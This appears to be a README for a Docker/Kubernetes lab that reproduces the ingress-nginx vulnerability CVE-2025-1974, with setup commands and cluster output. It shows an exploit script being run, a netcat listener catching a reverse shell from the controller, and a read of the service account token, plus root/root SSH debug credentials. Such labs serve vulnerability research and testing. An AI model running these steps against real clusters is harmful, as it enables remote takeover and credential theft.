ingress-nginx CVE-2025-1974

  • dqd:
    • ssst0n3/docker_archive:cve-2025-1974 -> ssst0n3/docker_archive:cve-2025-1974_v0.1.0
    • ssst0n3/docker_archive:cve-2025-1974_v0.1.0
  • ctr:
    • ssst0n3/docker_archive:ctr_cve-2025-1974 -> ssst0n3/docker_archive:ctr_cve-2025-1974_v0.1.0
    • ssst0n3/docker_archive:ctr_cve-2025-1974_v0.1.0

usage

$ cd vul/CVE-2025-1974
$ docker compose -f docker-compose.yml -f docker-compose.kvm.yml up -d
$ kubectl --kubeconfig=kubeconfig get pods -n ingress-nginx
NAME                                       READY   STATUS      RESTARTS      AGE
ingress-nginx-admission-create-7dj2s       0/1     Completed   0             4h37m
ingress-nginx-admission-patch-jzwpx        0/1     Completed   0             4h37m
ingress-nginx-controller-9456df685-9rlkg   1/1     Running     1 (43m ago)   4h37m
$ kubectl --kubeconfig=kubeconfig get services -n ingress-nginx
NAME                                 TYPE           CLUSTER-IP      EXTERNAL-IP   PORT(S)                      AGE
ingress-nginx-controller             LoadBalancer   10.96.110.135   <pending>     80:30534/TCP,443:30705/TCP   4h37m
ingress-nginx-controller-admission   ClusterIP      10.96.70.181    <none>        443/TCP                      4h37m
$ kubectl --kubeconfig=kubeconfig describe service -n ingress-nginx ingress-nginx-controller-admission
Name:              ingress-nginx-controller-admission
Namespace:         ingress-nginx
Labels:            app.kubernetes.io/component=controller
                   app.kubernetes.io/instance=ingress-nginx
                   app.kubernetes.io/name=ingress-nginx
                   app.kubernetes.io/part-of=ingress-nginx
                   app.kubernetes.io/version=1.11.3
Annotations:       <none>
Selector:          app.kubernetes.io/component=controller,app.kubernetes.io/instance=ingress-nginx,app.kubernetes.io/name=ingress-nginx
Type:              ClusterIP
IP Family Policy:  SingleStack
IP Families:       IPv4
IP:                10.96.70.181
IPs:               10.96.70.181
Port:              https-webhook  443/TCP
TargetPort:        webhook/TCP
Endpoints:         192.168.229.144:8443
Session Affinity:  None
Events:            <none>

reproduce

kubectl --kubeconfig=kubeconfig port-forward -n ingress-nginx svc/ingress-nginx-controller 8080:80 &
kubectl --kubeconfig=kubeconfig port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 8443:443 &
python3 exploit.py

$ nc -nlvp 2333
listening on [any] 2333 ...
connect to [172.17.0.1] from (UNKNOWN) [172.23.0.2] 52236
ls -lah /var/run/secrets/kubernetes.io/serviceaccount/token
lrwxrwxrwx    1 root     root          12 Mar 29 03:53 /var/run/secrets/kubernetes.io/serviceaccount/token -> ..data/token

build

make all DIR=vul/cve-2025-1974

for developers

FROM ssst0n3/docker_archive:ctr_cve-2025-1974_v0.1.0
...
RUN --security=insecure ["/sbin/init", "--log-target=kmsg"]

  • use dmesg -w to see build logs.
  • use a systemd service to execute commands.
  • ssh root/root 10.0.2.17 to debug.